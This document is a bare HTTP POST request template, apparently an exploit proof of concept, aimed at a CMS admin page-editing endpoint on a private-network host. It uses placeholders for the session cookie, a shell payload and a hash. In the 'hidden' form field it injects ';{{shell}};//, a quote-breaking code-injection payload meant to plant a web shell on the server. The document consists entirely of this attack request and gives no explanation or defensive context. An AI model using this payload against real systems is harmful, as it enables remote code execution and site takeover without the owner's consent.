POST /admin.php?action=editpage HTTP/1.1
Host: 192.168.37.133:8888
Proxy-Connection: keep-alive
Content-Length: 150
Cache-Control: max-age=0
Origin: http://192.168.37.133:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.37.133:8888/admin.php?action=editpage
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: {{cookie}}

title=aaaa&seo_name=baidu.com&content=6666&description=&keywords=&hidden=';{{shell}};//&sub_page={{hash}}&theme=default&save=Save
